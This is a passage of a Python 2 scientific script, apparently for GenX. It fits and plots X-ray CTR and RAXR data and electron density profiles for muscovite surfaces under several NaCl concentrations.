else:key=str(int(-h[0]))+'_'+str(int(-k[0]))
for ii in bl_dl[key]['segment']:
if abs(l_dumy[j])>=ii[0] and abs(l_dumy[j])<ii[1]:
n=bl_dl[key]['segment'].index(ii)
LB_dumy.append(bl_dl[key]['info'][n][1])
dL_dumy.append(bl_dl[key]['info'][n][0])
LB_dumy=np.array(LB_dumy)
dL_dumy=np.array(dL_dumy)
f_dumy=abs(sample.calculate_structure_factor(h_dumy,k_dumy,l_dumy,None,index=0,fit_mode=fit_mode,height_offset=height_offset,version=version))
#try:
# exp_const,mu,re,auc=sample.domain['exp_factors']
# pre_factor=3e6*np.exp(-exp_const*mu/q_dumy)*(4*np.pi*re/auc)**2/q_dumy**2
#except:
# pre_factor=1
if version>=1.2:
exp_const,mu,re,auc,ra_conc=sample.domain['exp_factors']
pre_factor=3e6*np.exp(-exp_const*mu/q_dumy)*(4*np.pi*re/auc)**2/q_dumy**2
elif version>=1.1:
exp_const,mu,re,auc=sample.domain['exp_factors']
pre_factor=3e6*np.exp(-exp_const*mu/q_dumy)*(4*np.pi*re/auc)**2/q_dumy**2
else:
pre_factor=1
f_dumy=rough_dumy*pre_factor*f_dumy*f_dumy
c_projected_on_z=sample.unit_cell.vol()/(sample.unit_cell.a*sample.unit_cell.b*np.sin(sample.unit_cell.gamma))
f_ctr=lambda q:(q*np.sin(q*c_projected_on_z/4))**2
#f_ctr=lambda q:(np.sin(q*19.96/4))**2
f_dumy_norm=f_dumy*f_ctr(q_dumy)
label=str(int(h[0]))+str(int(k[0]))+'L'
plot_data_container_experiment[label]=np.concatenate((l[:,np.newaxis],I[:,np.newaxis],eI[:,np.newaxis],(I*f_ctr(q_data))[:,np.newaxis],(eI*f_ctr(q_data))[:,np.newaxis]),axis=1)
plot_data_container_model[label]=np.concatenate((l_dumy[:,np.newaxis],f_dumy[:,np.newaxis],f_dumy_norm[:,np.newaxis]),axis=1)
Q_list_Fourier_synthesis=np.pi*2*sample.unit_cell.abs_hkl(np.array(HKL_list_raxr[0]),np.array(HKL_list_raxr[1]),np.array(HKL_list_raxr[2]))
A_list_calculated_sub,P_list_calculated_sub,Q_list_calculated_sub=sample.find_A_P_muscovite(h=list(HKL_list_raxr[0]),k=list(HKL_list_raxr[1]),l=list(HKL_list_raxr[2]))
#A_list_calculated_sub,P_list_calculated_sub,Q_list_calculated_sub=sample.find_A_P_muscovite(h=HKL_list_raxr[0][0],k=HKL_list_raxr[1][0],l=HKL_list_raxr[2][-1])
#dump CTR data and profiles
hkls=['00L']
plot_data_list=[]
for hkl in hkls:
plot_data_list.append([plot_data_container_experiment[hkl],plot_data_container_model[hkl]])
pickle.dump(plot_data_list,open(os.path.join(output_file_path,"temp_plot"),"wb"))
#dump raxr data and profiles
pickle.dump([plot_raxr_container_experiment,plot_raxr_container_model],open(os.path.join(output_file_path,"temp_plot_raxr"),"wb"))
pickle.dump([[A_list_calculated,P_list_calculated,Q_list_calculated],[A_list_Fourier_synthesis,P_list_Fourier_synthesis,Q_list_Fourier_synthesis]],open(os.path.join(output_file_path,"temp_plot_raxr_A_P_Q"),"wb"))
#dump electron density profiles
#e density based on model fitting
water_scaling=sample.plot_electron_density_muscovite(sample.domain,file_path=output_file_path,z_min=z_min,z_max=z_max,N_layered_water=100,height_offset=height_offset,version=version,freeze=freeze)#dumpt file name is "temp_plot_eden"
#e density based on Fourier synthesis
z_plot,eden_plot,eden_domains=sample.fourier_synthesis(np.array(HKL_list_raxr),np.array(P_list_Fourier_synthesis).transpose(),np.array(A_list_Fourier_synthesis).transpose(),z_min=z_min,z_max=z_max,resonant_el=sample.domain['el'],resolution=1000,water_scaling=water_scaling)
z_plot_sub,eden_plot_sub,eden_domains_sub=sample.fourier_synthesis(np.array(HKL_list_raxr),np.array(P_list_calculated_sub).transpose(),np.array(A_list_calculated_sub).transpose(),z_min=z_min,z_max=z_max,resonant_el=sample.domain['el'],resolution=1000,water_scaling=water_scaling)
#z_plot_sub,eden_plot_sub,eden_domains_sub=sample.fourier_synthesis(np.array([[HKL_list_raxr[0][0]]*100,[HKL_list_raxr[1][0]]*100,np.arange(0,HKL_list_raxr[2][-1],HKL_list_raxr[2][-1]/100.)]),np.array(P_list_calculated_sub).transpose(),np.array(A_list_calculated_sub).transpose(),z_min=z_min,z_max=z_max,resonant_el=sample.domain['el'],resolution=1000)
pickle.dump([z_plot,eden_plot,eden_domains],open(os.path.join(output_file_path,"temp_plot_eden_fourier_synthesis"),"wb"))
pickle.dump([z_plot_sub,eden_plot_sub,eden_domains_sub],open(os.path.join(output_file_path,"temp_plot_eden_fourier_synthesis_sub"),"wb"))
pickle.dump([water_scaling*0.25,water_scaling*0.75,water_scaling],open(os.path.join(output_file_path,"water_scaling"),"wb"))
#a function to make files to generate vtk files
def generate_plot_files_2(output_file_path,sample,rgh,data,fit_mode, z_min=0,z_max=29,RAXR_HKL=[0,0,20],bl_dl=bl_dl_muscovite,height_offset=0,tag=1):
plot_data_container_experiment={}
plot_data_container_model={}
plot_raxr_container_experiment={}
plot_raxr_container_model={}
A_list_Fourier_synthesis=[]
P_list_Fourier_synthesis=[]
HKL_list_raxr=[[],[],[]]
A_list_calculated,P_list_calculated,Q_list_calculated=sample.find_A_P_muscovite(h=RAXR_HKL[0],k=RAXR_HKL[1],l=RAXR_HKL[2])
i=0
for data_set in data:
f=np.array([])
h = data_set.extra_data['h']
k = data_set.extra_data['k']
x = data_set.x
y = data_set.extra_data['Y']
LB = data_set.extra_data['LB']
dL = data_set.extra_data['dL']
I=data_set.y
eI=data_set.error
if x[0]>100:
i+=1
A_key_list,P_key_list=[key for key in sample.domain['raxs_vars'].keys() if 'A'+str(i)+'_D' in key and 'set' not in key and 'get' not in key],[key for key in sample.domain['raxs_vars'].keys() if 'P'+str(i)+'_D' in key and 'set' not in key and 'get' not in key]
A_key_list.sort(),P_key_list.sort()
A_list_Fourier_synthesis.append(sample.domain['raxs_vars'][A_key_list[0]])
P_list_Fourier_synthesis.append(sample.domain['raxs_vars'][P_key_list[0]])
rough = (1-rgh.beta)/((1-rgh.beta)**2 + 4*rgh.beta*np.sin(np.pi*(y-LB)/dL)**2)**0.5
f=rough*abs(sample.calculate_structure_factor(h,k,x,y,index=i,fit_mode=fit_mode,height_offset=height_offset))
f=f*f
label=str(int(h[0]))+'_'+str(int(k[0]))+'_'+str(y[0])
plot_raxr_container_experiment[label]=np.concatenate((x[:,np.newaxis],I[:,np.newaxis],eI[:,np.newaxis]),axis=1)
plot_raxr_container_model[label]=np.concatenate((x[:,np.newaxis],f[:,np.newaxis]),axis=1)
HKL_list_raxr[0].append(h[0])
HKL_list_raxr[1].append(k[0])
HKL_list_raxr[2].append(y[0])
else:
f=np.array([])
h = data_set.extra_data['h']
k = data_set.extra_data['k']
l = data_set.x
LB = data_set.extra_data['LB']
dL = data_set.extra_data['dL']
I=data_set.y
eI=data_set.error
#make dumy hkl and f to make the plot look smoother
if l[0]>0:
l_dumy=np.arange(0.05,l[-1]+0.1,0.1)
else:
l_dumy=np.arange(l[0],l[-1]+0.1,0.1)
N=len(l_dumy)
h_dumy=np.array([h[0]]*N)
k_dumy=np.array([k[0]]*N)
q_dumy=np.pi*2*sample.unit_cell.abs_hkl(h_dumy,k_dumy,l_dumy)
q_data=np.pi*2*sample.unit_cell.abs_hkl(h,k,l)
LB_dumy=[]
dL_dumy=[]
f_dumy=[]
for j in range(N):
key=None
if l_dumy[j]>=0:
key=str(int(h[0]))+'_'+str(int(k[0]))
else:key=str(int(-h[0]))+'_'+str(int(-k[0]))
for ii in bl_dl[key]['segment']:
if abs(l_dumy[j])>=ii[0] and abs(l_dumy[j])<ii[1]:
n=bl_dl[key]['segment'].index(ii)
LB_dumy.append(bl_dl[key]['info'][n][1])
dL_dumy.append(bl_dl[key]['info'][n][0])
LB_dumy=np.array(LB_dumy)
dL_dumy=np.array(dL_dumy)
rough_dumy = (1-rgh.beta)/((1-rgh.beta)**2 + 4*rgh.beta*np.sin(np.pi*(l_dumy-LB_dumy)/dL_dumy)**2)**0.5
f_dumy=rough_dumy*abs(sample.calculate_structure_factor(h_dumy,k_dumy,l_dumy,None,index=0,fit_mode=fit_mode,height_offset=height_offset))
f_dumy=f_dumy*f_dumy
c_projected_on_z=sample.unit_cell.c*np.sin(np.pi-sample.unit_cell.beta)
f_ctr=lambda q:(np.sin(q*c_projected_on_z/4))**2
#f_ctr=lambda q:(np.sin(q*19.96/4))**2
f_dumy_norm=f_dumy*f_ctr(q_dumy)
label=str(int(h[0]))+str(int(k[0]))+'L'
plot_data_container_experiment[label]=np.concatenate((l[:,np.newaxis],I[:,np.newaxis],eI[:,np.newaxis],(I*f_ctr(q_data))[:,np.newaxis],(eI*f_ctr(q_data))[:,np.newaxis]),axis=1)
plot_data_container_model[label]=np.concatenate((l_dumy[:,np.newaxis],f_dumy[:,np.newaxis],f_dumy_norm[:,np.newaxis]),axis=1)
Q_list_Fourier_synthesis=np.pi*2*sample.unit_cell.abs_hkl(np.array(HKL_list_raxr[0]),np.array(HKL_list_raxr[1]),np.array(HKL_list_raxr[2]))
A_list_calculated_sub,P_list_calculated_sub,Q_list_calculated_sub=sample.find_A_P_muscovite(h=list(HKL_list_raxr[0]),k=list(HKL_list_raxr[1]),l=list(HKL_list_raxr[2]))
#A_list_calculated_sub,P_list_calculated_sub,Q_list_calculated_sub=sample.find_A_P_muscovite(h=HKL_list_raxr[0][0],k=HKL_list_raxr[1][0],l=HKL_list_raxr[2][-1])
#output files
#CTR
np.savetxt('D://temp_CTR'+str(tag),plot_data_container_model['00L'])
#RAXR
keys=plot_raxr_container_model.keys()
keys.sort()
np.savetxt('D://temp_RAXR'+str(tag),plot_raxr_container_model[keys[0]])
#Fourier components
#print A_list_calculated
ap_data=np.concatenate((A_list_calculated[:,np.newaxis],P_list_calculated[:,np.newaxis],Q_list_calculated[:,np.newaxis]),axis=1)
np.savetxt('D://temp_APQ'+str(tag),ap_data)
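#A minimal standalone sketch of the approximate beta-roughness factor applied to |F| in the loop above,
#rough = (1-beta)/sqrt((1-beta)**2 + 4*beta*sin(pi*(l-LB)/dL)**2); the helper name and its arguments are
#illustrative only and are not part of the GenX sample/rgh objects used elsewhere in this script.
def _beta_roughness_sketch(l, LB, dL, beta):
    import numpy as np
    l = np.asarray(l, dtype=float)
    LB = np.asarray(LB, dtype=float)
    dL = np.asarray(dL, dtype=float)
    #beta is the roughness parameter of the approximate roughness model (0 <= beta < 1)
    return (1.0 - beta) / ((1.0 - beta)**2 + 4.0 * beta * np.sin(np.pi * (l - LB) / dL)**2)**0.5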
#This function must be called within the shell of the GenX GUI; by default par_instance=model.parameters and dump_file='D://temp_plot_raxr_A_P_Q'.
#Its purpose is to append the errors of A and P, extracted from the error column displayed in the parameter tab of the GenX GUI, to the dumped A/P/Q file.
#Copy and paste the following command line into the shell to run it:
#model.script_module.create_plots.append_errors_for_A_P(par_instance=model.parameters,dump_file='D://temp_plot_raxr_A_P_Q',raxs_rgh='rgh_raxs')
def append_errors_for_A_P_original(par_instance,dump_file='D://temp_plot_raxr_A_P_Q',raxs_rgh='rgh_raxs'):
data_AP_Q=pickle.load(open(dump_file,"rb"))
AP_calculated=data_AP_Q[0]
A_model_fit,P_model_fit=data_AP_Q[1][0],data_AP_Q[1][1]
A_error_model_fit,P_error_model_fit=[],[]
table=np.array(par_instance.data)
for i in range(len(A_model_fit)):
A_error_model_fit_domain=[]
for j in range(len(A_model_fit[i])):
par_name=raxs_rgh+'.setA'+str(i+1)+'_D'+str(j+1)
for k in range(len(table)):
if table[k][0]==par_name:
if table[k][5][0]=='(' and table[k][5][-1]==')':
error=[abs(eval(table[k][5])[0]),abs(eval(table[k][5])[1])]
A_error_model_fit_domain.append(error)
else:
A_error_model_fit_domain.append(np.array([0.1,0.1]))
A_error_model_fit.append(A_error_model_fit_domain)
for i in range(len(P_model_fit)):
P_error_model_fit_domain=[]
for j in range(len(P_model_fit[i])):
par_name=raxs_rgh+'.setP'+str(i+1)+'_D'+str(j+1)
for k in range(len(table)):
if table[k][0]==par_name:
if table[k][5][0]=='(' and table[k][5][-1]==')':
error=[abs(eval(table[k][5])[0]),abs(eval(table[k][5])[1])]
P_error_model_fit_domain.append(error)
else:
P_error_model_fit_domain.append(np.array([0.1,0.1]))
P_error_model_fit.append(P_error_model_fit_domain)
dump_data=[[AP_calculated[0],AP_calculated[1],AP_calculated[2]],[data_AP_Q[1][0],data_AP_Q[1][1],data_AP_Q[1][2],A_error_model_fit,P_error_model_fit]]
pickle.dump(dump_data,open(dump_file,"wb"))
def append_errors_for_A_P(par_instance,dump_file='D://temp_plot_raxr_A_P_Q',raxs_rgh='rgh_raxs'):
data_AP_Q=pickle.load(open(dump_file,"rb"))
AP_calculated=data_AP_Q[0]
A_model_fit,P_model_fit=data_AP_Q[1][0],data_AP_Q[1][1]
A_error_model_fit,P_error_model_fit=[],[]
table=np.array(par_instance.data)
for i in range(len(A_model_fit)):
par_name=raxs_rgh+'.setA'+str(i+1)+'_D'+str(1)
for k in range(len(table)):
if table[k][0]==par_name:
if table[k][5][0]=='(' and table[k][5][-1]==')':
error=[abs(eval(table[k][5])[0]),abs(eval(table[k][5])[1])]
A_error_model_fit.append(error)
else:
A_error_model_fit.append(np.array([0.1,0.1]))
for i in range(len(P_model_fit)):
par_name=raxs_rgh+'.setP'+str(i+1)+'_D'+str(1)
for k in range(len(table)):
if table[k][0]==par_name:
if table[k][5][0]=='(' and table[k][5][-1]==')':
error=[abs(eval(table[k][5])[0]),abs(eval(table[k][5])[1])]
P_error_model_fit.append(error)
else:
P_error_model_fit.append(np.array([0.1,0.1]))
dump_data=[[AP_calculated[0],AP_calculated[1],AP_calculated[2]],[data_AP_Q[1][0],data_AP_Q[1][1],data_AP_Q[1][2],A_error_model_fit,P_error_model_fit]]
pickle.dump(dump_data,open(dump_file,"wb"))
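#A small illustrative helper (not called by the two functions above) showing how a GenX error-column string
#of the form '(-low, high)' is converted into the absolute [lower, upper] pair that append_errors_for_A_P
#stores; ast.literal_eval replaces the eval call purely for this sketch and is assumed to behave the same
#for well-formed '(a,b)' strings, with the same [0.1,0.1] fallback used above when no error is available.
def _parse_genx_error_string_sketch(error_str, default=(0.1, 0.1)):
    import ast
    error_str = error_str.strip()
    if error_str.startswith('(') and error_str.endswith(')'):
        low, high = ast.literal_eval(error_str)
        return [abs(low), abs(high)]
    return list(default)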
def plotting_raxr_new(data,savefile="D://raxr_temp.png",color=['b','r'],marker=['o']):
experiment_data,model=data[0],data[1]
labels=model.keys()
label_tag=map(lambda x:float(x.split("_")[-1]),labels)
label_tag.sort()
labels=map(lambda x:"0_0_"+str(x),label_tag)
#labels.sort()
fig=pyplot.figure(figsize=(15,len(labels)/3))
for i in range(len(labels)):
rows=None
if len(labels)%3==0:
rows=len(labels)/3
else:
rows=len(labels)/3+1
ax=fig.add_subplot(rows,3,i+1)
ax.scatter(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1],marker=marker[0],s=15,c=color[0],edgecolors=color[0],label="data points")
ax.errorbar(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1],yerr=experiment_data[labels[i]][:,2],fmt=None,color=color[0])
ax.plot(model[labels[i]][:,0],model[labels[i]][:,1],color=color[1],lw=3,label='model profile')
if i!=len(labels)-1:
ax.set_xticklabels([])
pyplot.xlabel('')
else:
pyplot.xlabel('Energy (kev)',axes=ax,fontsize=12)
pyplot.ylabel('|F|',axes=ax,fontsize=12)
pyplot.title(labels[i])
fig.tight_layout()
fig.savefig(savefile,dpi=300)
return fig
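#Usage sketch for plotting_raxr_new (the dump file name matches the default used by plot_all below; the
#output file name here is illustrative):
#    data_raxr = pickle.load(open(os.path.join(module_path_locator(), "temp_plot_raxr"), "rb"))
#    plotting_raxr_new(data_raxr, savefile=os.path.join(module_path_locator(), "raxr_overview.png"))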
def plotting_raxr_multiple(file_head=module_path_locator(),dump_files=['temp_plot_raxr_0NaCl','temp_plot_raxr_1NaCl','temp_plot_raxr_10NaCl','temp_plot_raxr_100NaCl'],label_marks=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],number=9,color_type=1,marker=['o']):
color=set_color(len(dump_files),color_type)
datas=[pickle.load(open(os.path.join(file_head,file))) for file in dump_files]
fig=pyplot.figure(figsize=(15,10))
for i in range(number):
ax=fig.add_subplot(3,3,i+1)
for j in range(len(datas)):
data=datas[j]
experiment_data,model=data[0],data[1]
labels=model.keys()
labels.sort()
label_tag=map(lambda x:float(x.split("_")[-1]),labels)
label_tag.sort()
labels=map(lambda x:"0_0_"+str(x),label_tag)
labels_comp=datas[0][1].keys()
labels_comp.sort()
offset=model[labels[i]][:,1][0]-datas[0][1][labels_comp[i]][:,1][0]-j*0.2#arbitrary offset between datasets
#print labels[i],offset
ax.scatter(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1]-offset,marker=marker[0],s=15,c=color[j],edgecolors=color[j],label=label_marks[j])
ax.errorbar(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1]-offset,yerr=experiment_data[labels[i]][:,2],fmt=None,ecolor=color[j])
ax.plot(model[labels[i]][:,0],model[labels[i]][:,1]-offset,color=color[j],lw=1.5)
if i in [6,7,8]:
pyplot.xlabel('Energy (ev)',axes=ax,fontsize=12)
if i in [0,3,6]:
pyplot.ylabel('|F|',axes=ax,fontsize=12)
if j==0:
pyplot.title(labels[i],size=12)
if i==0:
ax.legend(loc=2,ncol=2,prop={'size':12})
pyplot.ylim((1.5,3.5))
pyplot.subplots_adjust(wspace=0.2, hspace=None)
#fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_raxrs.png'),dpi=300)
return fig
def plotting_raxr_multiple_2(file_head=module_path_locator(),dump_files=['temp_plot_raxr_0NaCl','temp_plot_raxr_1NaCl','temp_plot_raxr_10NaCl','temp_plot_raxr_100NaCl'],label_marks=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],number_raxr=[0,1,6],color_type=1,marker=['o'],plot_layout=[3,1],fig_size=(4.5,6)):
color=set_color(len(dump_files),color_type)
datas=[pickle.load(open(os.path.join(file_head,file))) for file in dump_files]
fig=pyplot.figure(figsize=fig_size)
scale=0.3141#q=scale*L, scale=2pi/d[001]
number=None
if type(number_raxr)==type(1):
number=range(number_raxr)
else:
number=number_raxr
for i in number:
ax=fig.add_subplot(plot_layout[0],plot_layout[1],number.index(i)+1)
for j in range(len(datas)):
data=datas[j]
experiment_data,model=data[0],data[1]
labels=model.keys()
labels.sort()
label_tag=map(lambda x:float(x.split("_")[-1]),labels)
label_tag.sort()
labels=map(lambda x:"0_0_"+str(x),label_tag)
labels_title=map(lambda x:"q="+str(x)+r'$\rm{\ \AA^{-1}}$',np.round(np.array(label_tag)*scale,3))
#labels=map(lambda x:str(x),list(np.array(label_tag)*scale))
labels_comp=datas[0][1].keys()
labels_comp.sort()
offset=model[labels[i]][:,1][0]-datas[0][1][labels_comp[i]][:,1][0]-j*0.15#arbitrary offset between datasets
#print labels[i],offset
ax.scatter(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1]-offset,marker=marker[0],s=15,c=color[j],edgecolors=color[j],label=label_marks[j])
ax.errorbar(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1]-offset,yerr=experiment_data[labels[i]][:,2],fmt=None,ecolor=color[j])
ax.plot(model[labels[i]][:,0],model[labels[i]][:,1]-offset,color=color[j],lw=1.5)
pyplot.ylabel(r'|F|',axes=ax,fontsize=12)
if i!=number[-1]:
ax.get_xaxis().set_ticks([])
if i == number[-1]:
pyplot.xlabel(r'Energy (ev)',axes=ax,fontsize=12)
if j==0:
pyplot.title(labels_title[i],size=12)
#if i==0:
# ax.legend(loc=2,ncol=2,prop={'size':12})
# pyplot.ylim((1.5,3.5))
pyplot.subplots_adjust(wspace=0.2, hspace=None)
#fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_raxrs.png'),dpi=300)
return fig
def plotting_raxr_multiple_full_set(file_head=module_path_locator(),dump_files=['temp_plot_raxr_0NaCl','temp_plot_raxr_1NaCl','temp_plot_raxr_10NaCl','temp_plot_raxr_100NaCl'],label_marks=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],number_raxr=range(9),color_type=1,marker=['o'],plot_layout=[3,3],fig_size=(12,8)):
color=set_color(len(dump_files),color_type)
datas=[pickle.load(open(os.path.join(file_head,file))) for file in dump_files]
fig=pyplot.figure(figsize=fig_size)
scale=0.3141#q=scale*L, scale=2pi/d[001]
number=None
if type(number_raxr)==type(1):
number=range(number_raxr)
else:
number=number_raxr
for i in number:
ax=fig.add_subplot(plot_layout[0],plot_layout[1],number.index(i)+1)
for j in range(len(datas)):
data=datas[j]
experiment_data,model=data[0],data[1]
labels=model.keys()
labels.sort()
label_tag=map(lambda x:float(x.split("_")[-1]),labels)
label_tag.sort()
labels=map(lambda x:"0_0_"+str(x),label_tag)
labels_title=map(lambda x:"q="+str(x)+r'$\rm{\ \AA^{-1}}$',np.round(np.array(label_tag)*scale,3))
#labels=map(lambda x:str(x),list(np.array(label_tag)*scale))
labels_comp=datas[0][1].keys()
labels_comp.sort()
offset=model[labels[i]][:,1][0]-datas[0][1][labels_comp[i]][:,1][0]-j*0.15#arbitrary offset between datasets
#print labels[i],offset
ax.scatter(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1]-offset,marker=marker[0],s=15,c=color[j],edgecolors=color[j],label=label_marks[j])
ax.errorbar(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1]-offset,yerr=experiment_data[labels[i]][:,2],fmt=None,ecolor=color[j])
ax.plot(model[labels[i]][:,0],model[labels[i]][:,1]-offset,color=color[j],lw=1.5)
if number.index(i) in [0,3,6]:
pyplot.ylabel(r'|F|',axes=ax,fontsize=12)
if number.index(i) not in [6,7,8]:
ax.get_xaxis().set_ticks([])
if number.index(i) in [6,7,8]:
pyplot.xlabel(r'Energy (ev)',axes=ax,fontsize=12)
if j==0:
pyplot.title(labels_title[i],size=12)
#if i==0:
# ax.legend(loc=2,ncol=2,prop={'size':12})
# pyplot.ylim((1.5,3.5))
pyplot.subplots_adjust(wspace=0.2, hspace=None)
#fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_raxrs.png'),dpi=300)
return fig
def plot_CTR_multiple_model_muscovite(file_head=module_path_locator(),dump_files=['temp_plot_0NaCl','temp_plot_1NaCl','temp_plot_10NaCl','temp_plot_100NaCl'],labels=['0NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],markers=['.']*20,fontsize=16,lw=1.5,color_type=1):
colors=set_color(len(dump_files)*2,color_type)
objects=[pickle.load(open(os.path.join(file_head,file))) for file in dump_files]
fig=pyplot.figure(figsize=(10,8))
ax=fig.add_subplot(2,1,1)
ax.set_yscale('log')
scale=0.3141
for i in range(len(objects)):
object=objects[i][0]
ax.scatter(object[0][:,0]*scale,object[0][:,1]*(10**i),marker=markers[i],s=20,facecolors='none',edgecolors=colors[i],label='Data_'+labels[i])
ax.errorbar(object[0][:,0]*scale,object[0][:,1]*(10**i),yerr=object[0][:,2],fmt=None,ecolor=colors[i])
l,=ax.plot(object[1][:,0]*scale,object[1][:,1]*(10**i),color=colors[i],lw=lw,label='Model_'+labels[i])
#l.set_dashes(l_dashes[i])
#pyplot.xlabel('L(r.l.u)',axes=ax,fontsize=fontsize)
pyplot.ylabel(r'$\rm{|F_{HKL}|}$',axes=ax,fontsize=fontsize)
pyplot.title('(00L)',weight=4,size=fontsize,clip_on=True)
ax.legend(prop={'size':fontsize})
for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
ax.plot([0.4,0.4],[0,10000],'--',color='black')
ax.plot([0.9,0.9],[0,10000],'--',color='black')
pyplot.xlim((-2*scale,30*scale))
ax=fig.add_subplot(2,1,2)
ax.set_yscale('log')
for i in range(len(objects)):
object=objects[i][0]
ax.scatter(object[0][:,0]*scale,object[0][:,3]*(10**i),marker=markers[i],s=20,facecolors='none',edgecolors=colors[i],label='Data_'+labels[i])
ax.errorbar(object[0][:,0]*scale,object[0][:,3]*(10**i),yerr=object[0][:,4],fmt=None,ecolor=colors[i])
l,=ax.plot(object[1][:,0]*scale,object[1][:,2]*(10**i),color=colors[i],lw=lw,label='Model_'+labels[i])
#l.set_dashes(l_dashes[i])
pyplot.xlabel(r'$\rm{q\ (\AA^{-1})}$',axes=ax,fontsize=fontsize)
pyplot.ylabel(r'$\rm{|normalized\ F_{HKL}|}$',axes=ax,fontsize=fontsize)
#pyplot.title('(00L)',weight=4,size=10,clip_on=True)
ax.plot([0.4,0.4],[0,10000],'--',color='black')
ax.plot([0.9,0.9],[0,10000],'--',color='black')
#ax.plot([2.92*scale,2.92*scale],[0,10000],'--',color='black')
ax.legend(prop={'size':fontsize})
for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
pyplot.xlim((-2*scale,30*scale))
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_ctrs.png'),dpi=300)
return fig
def plot_CTR_multiple_model_muscovite_2(file_head=module_path_locator(),dump_files=['temp_plot_0NaCl','temp_plot_1NaCl','temp_plot_10NaCl','temp_plot_100NaCl'],labels=['0NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],markers=['.']*20,fontsize=12,lw=1.5,color_type=1):
colors=set_color(len(dump_files)*2,color_type)
objects=[pickle.load(open(os.path.join(file_head,file))) for file in dump_files]
fig=pyplot.figure(figsize=(5,4))
ax=fig.add_subplot(1,1,1)
ax.set_yscale('log')
scale=0.3141#q=scale*L, scale=2pi/d[001]
for i in range(len(objects)):
object=objects[i][0]
ax.scatter(object[0][:,0]*scale,object[0][:,1]*(10**i),marker=markers[i],s=20,facecolors='none',edgecolors=colors[i],label='Data_'+labels[i])
ax.errorbar(object[0][:,0]*scale,object[0][:,1]*(10**i),yerr=object[0][:,2],fmt=None,ecolor=colors[i])
l,=ax.plot(object[1][:,0]*scale,object[1][:,1]*(10**i),color=colors[i],lw=lw,label='Model_'+labels[i])
#l.set_dashes(l_dashes[i])
#pyplot.xlabel('L(r.l.u)',axes=ax,fontsize=fontsize)
pyplot.xlabel(r'$\rm{q\ (\AA^{-1})}$',axes=ax,fontsize=fontsize)
pyplot.ylabel(r'$\rm{|F_{HKL}|}$',axes=ax,fontsize=fontsize)
#pyplot.title('(00L)',weight=4,size=fontsize,clip_on=True)
#ax.legend(prop={'size':fontsize})
for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
ax.plot([0.35,0.35],[0,10000],':',color='black')
ax.plot([0.87,0.87],[0,10000],':',color='black')
pyplot.xlim((0,5.5))
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_ctrs.png'),dpi=300)
return fig
def plot_CTR_multiple_model_muscovite_matlab_outputs(file_head=module_path_locator(),c_projected=[19.9347,19.9597,19.9167,19.9803],dump_files=[['ctr_data_0mM_NaCl.dat','bestfit_ctr_results_0mM_NaCl.dat'],['ctr_data_1mM_NaCl.dat','bestfit_ctr_results_1mM_NaCl.dat'],['ctr_data_10mM_NaCl.dat','bestfit_ctr_results_10mM_NaCl.dat'],['ctr_data_100mM_NaCl.dat','bestfit_ctr_results_100mM_NaCl.dat']],labels=['0NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],markers=['.']*10,fontsize=13,lw=0.5,color_type=[1,5]):
hfont = {'fontname':['times new roman','Helvetica'][0]}
colors=set_color(len(dump_files)*2,color_type[0])
colors_2=set_color(len(dump_files)*2,color_type[0])
objects=[]
for i in range(len(dump_files)):
objects.append([np.loadtxt(os.path.join(file_head,dump_files[i][0])),np.loadtxt(os.path.join(file_head,dump_files[i][1]))])
fig=pyplot.figure(figsize=(5,4))
ax=fig.add_subplot(1,1,1)
ax.set_yscale('log')
def _find_index_of_near_bragg_peak(q_list=[],l_bragg=[0,2,4,6,8,10,12,14,16],c=19.9347):
index_list=[0]
q_bragg=np.array(l_bragg)*np.pi*2/c
for i in range(len(q_list)):
if i!=len(q_list)-1:
for q in q_bragg:
if q_list[i]<q and q_list[i+1]>q:
index_list.append(i+1)
break
index_list.append(len(q_list))
return index_list
for i in range(len(objects)):
object_data=objects[i][0]
max_q=5.588
print max_q
object_model=objects[i][1]
index_use=np.where(object_model[:,0]<max_q)[0]
object_model=np.append(object_model[index_use,0][:,np.newaxis],object_model[index_use,1][:,np.newaxis],axis=1)
index_list=_find_index_of_near_bragg_peak(object_model[:,0],c=c_projected[i])
ax.scatter(object_data[:,0],object_data[:,1]*(100**i),marker=markers[i],s=10,facecolors='none',edgecolors=colors_2[i],alpha=0.8,label='Data_'+labels[i])
ax.errorbar(object_data[:,0],object_data[:,1]*(100**i),yerr=object_data[:,2]*(100**i),fmt=None,alpha=0.8,ecolor=colors_2[i])
for j in range(len(index_list)-1):
l,=ax.plot(object_model[index_list[j]:index_list[j+1],0],object_model[index_list[j]:index_list[j+1],1]*(100**i),color=colors[i],lw=lw,label='Model_'+labels[i])
pyplot.xlabel(r'$\rm{q\ (\AA^{-1})}$',axes=ax,fontsize=fontsize,**hfont)
pyplot.ylabel(r'$\rm{Intensity}$',axes=ax,fontsize=fontsize,**hfont)
